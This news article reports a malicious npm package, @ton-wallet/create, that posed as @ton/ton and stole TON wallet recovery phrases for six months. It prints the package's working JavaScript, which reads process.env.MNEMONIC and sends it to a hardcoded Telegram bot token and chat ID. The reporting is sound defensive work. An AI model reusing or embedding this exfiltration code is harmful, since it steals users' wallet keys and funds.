Malicious npm Package Targets TON Wallet Users, Stealing Cryptocurrency Keys

A newly discovered malicious npm package, @ton-wallet/create, has been found stealing mnemonic phrases from unsuspecting developers and users in the TON (The Open Network) blockchain ecosystem. The threat, uncovered by The Socket Research Team, impersonated the legitimate @ton/ton package and remained undetected for six months, posing a significant supply chain security risk.

The @ton-wallet/create package masqueraded as the trusted @ton/ton dependency, a widely used package with over 64,804 weekly downloads. The name similarity allowed attackers to trick developers into installing the malicious version.

According to the Socket Research Team: “The threat actor’s strategy was straightforward but effective. By mimicking the legitimate @ton/ton package, widely used in the TON blockchain community, @ton-wallet/create gained credibility.”

For half a year, this stealthy attack siphoned off sensitive mnemonic phrases, leaving wallet holders and blockchain developers exposed to cryptocurrency theft.

At the core of this attack was the process.env.MNEMONIC environment variable—a commonly used method for storing wallet recovery phrases in Node.js applications. The attackers injected malicious JavaScript code into index.js within the npm package, silently exfiltrating these keys.

const TelegramBot = require("node-telegram-bot-api");
function createWallet() {
    const token = '7493700888:AAGJ5nyXemePuHqleSOqkIM23Yhs0o01q-Q'; // Attacker's bot token
    const chatId = '-1002197015763'; // Attacker's Telegram chat ID
    const bot = new TelegramBot(token, { polling: false }); // Silent message dispatch
    bot.sendMessage(chatId, `env.KEY=` + process.env.MNEMONIC);
    return process.env.MNEMONIC;
}
exports.createWallet = createWallet;

This script uses node-telegram-bot-api to send stolen mnemonics directly to an attacker-controlled Telegram bot. The hardcoded API token and chat ID ensured seamless theft of private wallet keys without raising immediate suspicion.

With over 1 million TON users worldwide, the scale of potential damage was enormous, making immediate response and mitigation essential.

Related Posts:

• Rhadamanthys Evolves: AI-Powered Crypto Theft with Version 0.7.0
• Malicious npm Packages Exploiting Typosquatting to Inject SSH Backdoors
• Webflow Weaponized: Phishing Attacks Target Crypto Wallets
• Malicious npm Packages Threaten Crypto Developers: Keylogging and Wallet Theft Revealed

Support Our Threat Intelligence

If you find our CVE report and cybersecurity news helpful, consider supporting our work.

Buy Me a Coffee PayPal

Crypto

USDT (TRC20):

TN8BdV8cp4T1Cd28gK9qTAnZknzzuwyUtm Copy

USDT (ERC20):

0x3725e1a7d3bc5765499fa6aaafe307fabcd75bce Copy

Do Son

Do Son (aka Ddos) is a seasoned news reporter, bringing over a decade of expertise to the forefront of cyber security and technology reporting. My work provides timely and insightful analysis of emerging trends and critical developments in these rapidly evolving sectors.